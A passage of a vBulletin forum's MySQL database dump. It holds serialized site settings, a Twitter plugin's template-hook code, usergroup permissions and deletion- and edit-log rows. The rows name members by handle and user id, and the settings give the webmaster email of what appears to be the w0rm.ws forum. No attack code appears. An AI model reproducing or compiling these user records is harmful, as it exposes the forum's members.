A\";s:10:\"timeoffset\";i:4;s:19:\"timeoutcontrolpanel\";i:0;s:13:\"titlemaxchars\";i:85;s:7:\"tmppath\";s:4:\"/tmp\";s:6:\"tosurl\";s:0:\"\";s:15:\"twitter_key_pub\";s:0:\"\";s:15:\"twitter_key_sec\";s:0:\"\";s:9:\"uiforumid\";i:0;s:9:\"uimessage\";i:1;s:11:\"unallowhtml\";i:0;s:10:\"unallowimg\";i:1;s:14:\"unallowsmilies\";i:1;s:13:\"unallowvbcode\";i:1;s:14:\"updatelastpost\";i:0;s:13:\"usebulkheader\";i:0;s:8:\"usecoppa\";i:0;s:13:\"usefileavatar\";i:0;s:16:\"usefilegroupicon\";i:0;s:12:\"useforumjump\";i:0;s:17:\"useheaderredirect\";i:1;s:13:\"usehotthreads\";i:1;s:12:\"usemailqueue\";i:1;s:22:\"usememberlistadvsearch\";i:1;s:9:\"usepopups\";i:1;s:29:\"usercss_allowed_border_widths\";s:32:\"small|1px\r\nmedium|2px\r\nlarge|3px\";s:21:\"usercss_allowed_fonts\";s:446:\"arial|Arial, Helvetica, sans-serif\r\ntimes_new_roman|\'Times New Roman\', Times, serif\r\ncourier_new|\'Courier New\', Courier, monospace\r\ngeorgia|Georgia, \'Times New Roman\', Times, serif\r\nverdana|Verdana, Arial, Helvetica, sans-serif\r\ntahoma|Tahoma, Verdana, Arial, Helvetica, sans-serif\r\ngeneva|Geneva, Arial, Helvetica, sans-serif\r\ntrebuchet_ms|\'Trebuchet MS\', Arial, Helvetica, sans-serif\r\ncomic_sans_ms|\'Comic Sans MS\', Arial, Helvetica, sans-serif\";s:26:\"usercss_allowed_font_sizes\";s:39:\"small|small\r\nmedium|medium\r\nlarge|large\";s:23:\"usercss_allowed_padding\";s:80:\"none|0px\r\ntiny|1px\r\nsmall|2px\r\nmedium|3px\r\nlarge|6px\r\nhuge|10px\r\ngargantuan|20px\";s:11:\"usereferrer\";i:1;s:12:\"usermaxposts\";s:13:\"5,10,20,30,40\";s:13:\"usernameregex\";s:0:\"\";s:18:\"usernamereusedelay\";i:365;s:15:\"usestrikesystem\";i:1;s:8:\"use_smtp\";i:1;s:15:\"vb_antispam_key\";s:0:\"\";s:17:\"vb_antispam_posts\";i:0;s:16:\"vb_antispam_type\";i:0;s:11:\"verifyemail\";i:0;s:18:\"viewattachedimages\";i:1;s:8:\"viewfunc\";s:4:\"none\";s:9:\"viewscore\";d:0.01;s:17:\"vm_allowed_bbcode\";i:1091;s:11:\"vm_maxchars\";i:1000;s:13:\"vm_maxperpage\";i:50;s:13:\"vm_moderation\";i:0;s:10:\"vm_perpage\";i:10;s:10:\"votechange\";i:0;s:14:\"webmasteremail\";s:13:\"forum@w0rm.ws\";s:11:\"welcomemail\";i:0;s:9:\"welcomepm\";s:1:\"0\";s:9:\"WOLenable\";i:1;s:9:\"WOLguests\";i:0;s:10:\"WOLrefresh\";i:60;s:10:\"WOLresolve\";i:0;s:8:\"wordwrap\";i:50;s:15:\"wysiwyg_smtotal\";i:15;s:8:\"yestoday\";i:1;}', 1), ('pluginlist', 'a:5:{s:15:\"cache_templates\";s:87:\"if (THIS_SCRIPT == \'profile\')\r\n{\r\n $globaltemplates[] = \'modifyoptions_vbtwitter\';\r\n}\r\n\";s:24:\"postbit_display_complete\";s:683:\"$twitter_find = \'
\';\r\n$twitter_add = \'$vbphrase[twitter_post]\';\r\n\r\nif(strstr($this->registry->templatecache[\'postbit\'], $twitter_add) === false)\r\n{\r\n $this->registry->templatecache[\'postbit\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $this->registry->templatecache[\'postbit\']);\r\n}\r\n\r\nif(strstr($this->registry->templatecache[\'postbit_legacy\'], $twitter_add) === false)\r\n{\r\n $this->registry->templatecache[\'postbit_legacy\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $this->registry->templatecache[\'postbit_legacy\']);\r\n}\r\n\";s:25:\"profile_editoptions_start\";s:127:\"// Add the template\r\neval(\"\\$template_hook[usercp_options_other] .= \\\"\" . fetch_template(\'modifyoptions_vbtwitter\') . \"\\\";\");\r\n\";s:19:\"showthread_complete\";s:527:\"$twitter_find = \'\r\n $vbphrase[thread_tools]\r\n \';\r\n$twitter_add = \'\r\n \r\n \\\"$vbphrase[twitter_thread]\\\" $vbphrase[twitter_thread]\r\n \r\n \';\r\n\r\n$vbulletin->templatecache[\'SHOWTHREAD\'] = str_replace($twitter_find, $twitter_find . $twitter_add, $vbulletin->templatecache[\'SHOWTHREAD\']);\r\n\";s:14:\"userdata_start\";s:131:\"$this->validfields[\'oauth_token\'] = array(TYPE_STR, REQ_NO);\r\n$this->validfields[\'oauth_token_secret\'] = array(TYPE_STR, REQ_NO);\r\n\";}', 1), ('pluginlistadmin', 'a:0:{}', 1), ('prefixcache', 'a:0:{}', 1), ('products', 'a:2:{s:12:\"kk_vbtwitter\";s:1:\"1\";s:9:\"vbulletin\";s:1:\"1\";}', 1), ('ranks', 'a:0:{}', 1), ('searchcloud', 'a:3:{s:4:\"tags\";a:0:{}s:5:\"count\";i:0;s:8:\"dateline\";i:1465211441;}', 1), ('sg_category_cloud', 'a:0:{}', 1), ('sg_newest_groups', 'a:0:{}', 1), ('smiliecache', 'a:11:{i:10;a:7:{s:8:\"smilieid\";s:2:\"10\";s:5:\"title\";s:8:\"Confused\";s:10:\"smilietext\";s:10:\":confused:\";s:10:\"smiliepath\";s:27:\"images/smilies/confused.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:2:\"10\";}i:7;a:7:{s:8:\"smilieid\";s:1:\"7\";s:5:\"title\";s:21:\"Roll Eyes (Sarcastic)\";s:10:\"smilietext\";s:10:\":rolleyes:\";s:10:\"smiliepath\";s:27:\"images/smilies/rolleyes.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"3\";s:9:\"smilielen\";s:2:\"10\";}i:6;a:7:{s:8:\"smilieid\";s:1:\"6\";s:5:\"title\";s:4:\"Cool\";s:10:\"smilietext\";s:6:\":cool:\";s:10:\"smiliepath\";s:23:\"images/smilies/cool.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"5\";s:9:\"smilielen\";s:1:\"6\";}i:9;a:7:{s:8:\"smilieid\";s:1:\"9\";s:5:\"title\";s:4:\"EEK!\";s:10:\"smilietext\";s:5:\":eek:\";s:10:\"smiliepath\";s:22:\"images/smilies/eek.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"7\";s:9:\"smilielen\";s:1:\"5\";}i:8;a:7:{s:8:\"smilieid\";s:1:\"8\";s:5:\"title\";s:3:\"Mad\";s:10:\"smilietext\";s:5:\":mad:\";s:10:\"smiliepath\";s:22:\"images/smilies/mad.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"5\";}i:1;a:7:{s:8:\"smilieid\";s:1:\"1\";s:5:\"title\";s:5:\"Smile\";s:10:\"smilietext\";s:2:\":)\";s:10:\"smiliepath\";s:24:\"images/smilies/smile.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:5;a:7:{s:8:\"smilieid\";s:1:\"5\";s:5:\"title\";s:16:\"Stick Out Tongue\";s:10:\"smilietext\";s:2:\":p\";s:10:\"smiliepath\";s:25:\"images/smilies/tongue.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:4;a:7:{s:8:\"smilieid\";s:1:\"4\";s:5:\"title\";s:4:\"Wink\";s:10:\"smilietext\";s:2:\";)\";s:10:\"smiliepath\";s:23:\"images/smilies/wink.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:3;a:7:{s:8:\"smilieid\";s:1:\"3\";s:5:\"title\";s:8:\"Big Grin\";s:10:\"smilietext\";s:2:\":D\";s:10:\"smiliepath\";s:26:\"images/smilies/biggrin.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:2;a:7:{s:8:\"smilieid\";s:1:\"2\";s:5:\"title\";s:13:\"Embarrassment\";s:10:\"smilietext\";s:2:\":o\";s:10:\"smiliepath\";s:26:\"images/smilies/redface.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}i:11;a:7:{s:8:\"smilieid\";s:2:\"11\";s:5:\"title\";s:5:\"Frown\";s:10:\"smilietext\";s:2:\":(\";s:10:\"smiliepath\";s:24:\"images/smilies/frown.gif\";s:15:\"imagecategoryid\";s:1:\"1\";s:12:\"displayorder\";s:1:\"1\";s:9:\"smilielen\";s:1:\"2\";}}', 1), ('stylecache', 'a:1:{i:-1;a:1:{i:1;a:2:{i:0;a:5:{s:7:\"styleid\";s:1:\"1\";s:5:\"title\";s:13:\"Default Style\";s:8:\"parentid\";s:2:\"-1\";s:12:\"displayorder\";s:1:\"1\";s:10:\"userselect\";s:1:\"0\";}i:1;a:5:{s:7:\"styleid\";s:1:\"2\";s:5:\"title\";s:13:\"Sleek Passion\";s:8:\"parentid\";s:2:\"-1\";s:12:\"displayorder\";s:1:\"1\";s:10:\"userselect\";s:1:\"1\";}}}}', 1), ('tagcloud', 'a:3:{s:4:\"tags\";a:0:{}s:5:\"count\";i:0;s:8:\"dateline\";i:1464302757;}', 1), ('usergroupcache', 'a:8:{i:4;a:48:{s:11:\"usergroupid\";i:4;s:5:\"title\";s:33:\"(COPPA) Users Awaiting Moderation\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:0:\"\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:1;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:655375;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:1;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:33554499;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:56;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:16;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:192;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:64;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:6;a:48:{s:11:\"usergroupid\";i:6;s:5:\"title\";s:14:\"Administrators\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:13:\"Administrator\";s:15:\"passwordexpires\";i:180;s:15:\"passwordhistory\";i:360;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:5;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:16777215;s:13:\"pmpermissions\";i:7;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:31;s:16:\"adminpermissions\";i:3;s:18:\"genericpermissions\";i:2147483583;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:55;s:20:\"signaturepermissions\";i:237567;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:80;s:15:\"avatarmaxheight\";i:80;s:13:\"avatarmaxsize\";i:20000;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:500;s:15:\"sigpicmaxheight\";i:100;s:13:\"sigpicmaxsize\";i:10000;s:12:\"sigmaximages\";i:0;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:0;s:14:\"sigmaxrawchars\";i:0;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:65535;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:8;a:48:{s:11:\"usergroupid\";i:8;s:5:\"title\";s:12:\"Banned Users\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:6:\"Banned\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:0;s:9:\"pmsendmax\";i:0;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:0;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:0;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:0;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:0;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:0;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:0;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:0;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:7;a:48:{s:11:\"usergroupid\";i:7;s:5:\"title\";s:10:\"Moderators\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:9:\"Moderator\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:5;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:12317183;s:13:\"pmpermissions\";i:7;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:15;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:1609504463;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:62;s:20:\"signaturepermissions\";i:237567;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:80;s:15:\"avatarmaxheight\";i:80;s:13:\"avatarmaxsize\";i:20000;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:500;s:15:\"sigpicmaxheight\";i:100;s:13:\"sigpicmaxsize\";i:10000;s:12:\"sigmaximages\";i:4;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:500;s:14:\"sigmaxrawchars\";i:1000;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:65535;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:2;a:48:{s:11:\"usergroupid\";i:2;s:5:\"title\";s:16:\"Registered Users\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:0:\"\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:5;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:12317183;s:13:\"pmpermissions\";i:3;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:1;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:1579685063;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:62;s:20:\"signaturepermissions\";i:137215;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:4;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:500;s:14:\"sigmaxrawchars\";i:1000;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:55159;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:5;a:48:{s:11:\"usergroupid\";i:5;s:5:\"title\";s:16:\"Super Moderators\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:15:\"Super Moderator\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:0;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:16777215;s:13:\"pmpermissions\";i:7;s:19:\"calendarpermissions\";i:63;s:14:\"wolpermissions\";i:15;s:16:\"adminpermissions\";i:1;s:18:\"genericpermissions\";i:1609520879;s:19:\"genericpermissions2\";i:1;s:14:\"genericoptions\";i:63;s:20:\"signaturepermissions\";i:237567;s:25:\"visitormessagepermissions\";i:63;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:80;s:15:\"avatarmaxheight\";i:80;s:13:\"avatarmaxsize\";i:20000;s:18:\"profilepicmaxwidth\";i:100;s:19:\"profilepicmaxheight\";i:100;s:17:\"profilepicmaxsize\";i:65535;s:14:\"sigpicmaxwidth\";i:500;s:15:\"sigpicmaxheight\";i:100;s:13:\"sigpicmaxsize\";i:10000;s:12:\"sigmaximages\";i:4;s:16:\"sigmaxsizebbcode\";i:7;s:11:\"sigmaxchars\";i:500;s:14:\"sigmaxrawchars\";i:1000;s:11:\"sigmaxlines\";i:0;s:18:\"usercsspermissions\";i:63;s:16:\"albumpermissions\";i:255;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:65535;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}i:1;a:48:{s:11:\"usergroupid\";i:1;s:5:\"title\";s:28:\"Unregistered / Not Logged In\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:5:\"Guest\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:0;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:655375;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:1;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:33554433;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:104;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:16;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:192;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:64;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:0;}i:3;a:48:{s:11:\"usergroupid\";i:3;s:5:\"title\";s:33:\"Users Awaiting Email Confirmation\";s:11:\"description\";s:0:\"\";s:9:\"usertitle\";s:0:\"\";s:15:\"passwordexpires\";i:0;s:15:\"passwordhistory\";i:0;s:7:\"pmquota\";i:50;s:9:\"pmsendmax\";i:1;s:7:\"opentag\";s:0:\"\";s:8:\"closetag\";s:0:\"\";s:11:\"canoverride\";i:0;s:13:\"ispublicgroup\";i:0;s:16:\"forumpermissions\";i:655375;s:13:\"pmpermissions\";i:0;s:19:\"calendarpermissions\";i:1;s:14:\"wolpermissions\";i:0;s:16:\"adminpermissions\";i:0;s:18:\"genericpermissions\";i:33554499;s:19:\"genericpermissions2\";i:0;s:14:\"genericoptions\";i:56;s:20:\"signaturepermissions\";i:0;s:25:\"visitormessagepermissions\";i:16;s:11:\"attachlimit\";i:0;s:14:\"avatarmaxwidth\";i:-1;s:15:\"avatarmaxheight\";i:-1;s:13:\"avatarmaxsize\";i:-1;s:18:\"profilepicmaxwidth\";i:-1;s:19:\"profilepicmaxheight\";i:-1;s:17:\"profilepicmaxsize\";i:-1;s:14:\"sigpicmaxwidth\";i:-1;s:15:\"sigpicmaxheight\";i:-1;s:13:\"sigpicmaxsize\";i:-1;s:12:\"sigmaximages\";i:-1;s:16:\"sigmaxsizebbcode\";i:-1;s:11:\"sigmaxchars\";i:-1;s:14:\"sigmaxrawchars\";i:-1;s:11:\"sigmaxlines\";i:-1;s:18:\"usercsspermissions\";i:0;s:16:\"albumpermissions\";i:192;s:16:\"albumpicmaxwidth\";i:600;s:17:\"albumpicmaxheight\";i:600;s:15:\"albumpicmaxsize\";i:100000;s:12:\"albummaxpics\";i:100;s:12:\"albummaxsize\";i:0;s:22:\"socialgrouppermissions\";i:64;s:18:\"pmthrottlequantity\";i:0;s:16:\"groupiconmaxsize\";i:65535;s:19:\"maximumsocialgroups\";i:5;}}', 1), ('userstats', 'a:4:{s:13:\"numbermembers\";s:3:\"324\";s:13:\"activemembers\";s:2:\"42\";s:11:\"newusername\";s:4:\"0day\";s:9:\"newuserid\";s:3:\"388\";}', 1), ('wol_spiders', '', 1); DROP TABLE IF EXISTS `deletionlog`; CREATE TABLE `deletionlog` ( `primaryid` int(10) unsigned NOT NULL DEFAULT '0', `type` enum('post','thread','visitormessage','groupmessage','picturecomment') NOT NULL DEFAULT 'post', `userid` int(10) unsigned NOT NULL DEFAULT '0', `username` varchar(100) NOT NULL DEFAULT '', `reason` varchar(125) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`primaryid`,`type`), KEY `type` (`type`,`dateline`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `deletionlog` (`primaryid`, `type`, `userid`, `username`, `reason`, `dateline`) VALUES (2, 'visitormessage', 173, 'tdss', 'spam', 1450799447), (3, 'visitormessage', 171, 'st1x0', '', 1446728170), (4, 'visitormessage', 173, 'tdss', 'spam', 1450799447), (25, 'visitormessage', 171, 'st1x0', '', 1446728170), (1826, 'thread', 1, 'admin', '', 1422256468), (2311, 'thread', 100, 'w0rm', '', 1442834375), (2316, 'thread', 100, 'w0rm', '', 1442834375); DROP TABLE IF EXISTS `discussion`; CREATE TABLE `discussion` ( `discussionid` int(10) unsigned NOT NULL AUTO_INCREMENT, `groupid` int(10) unsigned NOT NULL, `firstpostid` int(10) unsigned NOT NULL, `lastpostid` int(10) unsigned NOT NULL, `lastpost` int(10) unsigned NOT NULL, `lastposter` varchar(255) NOT NULL, `lastposterid` int(10) unsigned NOT NULL, `visible` int(10) unsigned NOT NULL DEFAULT '0', `deleted` int(10) unsigned NOT NULL DEFAULT '0', `moderation` int(10) unsigned NOT NULL DEFAULT '0', `subscribers` enum('0','1') DEFAULT '0', PRIMARY KEY (`discussionid`), KEY `groupid` (`groupid`,`lastpost`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `discussionread`; CREATE TABLE `discussionread` ( `userid` int(10) unsigned NOT NULL, `discussionid` int(10) unsigned NOT NULL, `readtime` int(10) unsigned NOT NULL, PRIMARY KEY (`userid`,`discussionid`), KEY `readtime` (`readtime`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `editlog`; CREATE TABLE `editlog` ( `postid` int(10) unsigned NOT NULL DEFAULT '0', `userid` int(10) unsigned NOT NULL DEFAULT '0', `username` varchar(100) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `reason` varchar(200) NOT NULL DEFAULT '', `hashistory` smallint(6) NOT NULL DEFAULT '0', PRIMARY KEY (`postid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `editlog` (`postid`, `userid`, `username`, `dateline`, `reason`, `hashistory`) VALUES (1028, 173, 'tdss', 1453649999, '', 1), (2287, 171, 'st1x0', 1442920448, '', 1), (2702, 173, 'tdss', 1457883960, '', 1), (2800, 383, 'scene', 1456128780, '', 1), (2801, 383, 'scene', 1456128861, '', 1), (2865, 383, 'scene', 1456128876, '', 1), (2878, 173, 'tdss', 1457983445, '', 1), (2895, 178, 'dark001', 1445862196, '', 1), (2994, 173, 'tdss', 1455217507, '', 1), (3021, 173, 'tdss', 1457801344, '', 1), (3045, 387, 'ke7hb', 1463760123, '', 1); DROP TABLE IF EXISTS `event`; CREATE TABLE `event` ( `eventid` int(10) unsigned NOT NULL AUTO_INCREMENT, `userid` int(10) unsigned NOT NULL DEFAULT '0', `event` mediumtext, `title` varchar(250) NOT NULL DEFAULT '', `allowsmilies` smallint(6) NOT NULL DEFAULT '1', `recurring` smallint(6) NOT NULL DEFAULT '0', `recuroption` char(6) NOT NULL DEFAULT '', `calendarid` int(10) unsigned NOT NULL DEFAULT '0', `customfields` mediumtext, `visible` smallint(6) NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `utc` decimal(4,2) NOT NULL DEFAULT '0.00', `dst` smallint(6) NOT NULL DEFAULT '1', `dateline_from` int(10) unsigned NOT NULL DEFAULT '0', `dateline_to` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`eventid`), KEY `userid` (`userid`), KEY `calendarid` (`calendarid`), KEY `visible` (`visible`), KEY `daterange` (`dateline_to`,`dateline_from`,`visible`,`calendarid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `externalcache`; CREATE TABLE `externalcache` ( `cachehash` char(32) NOT NULL DEFAULT '', `text` mediumtext, `headers` mediumtext, `dateline` int(10) unsigned NOT NULL DEFAULT '0', `forumid` int(10) unsigned NOT NULL 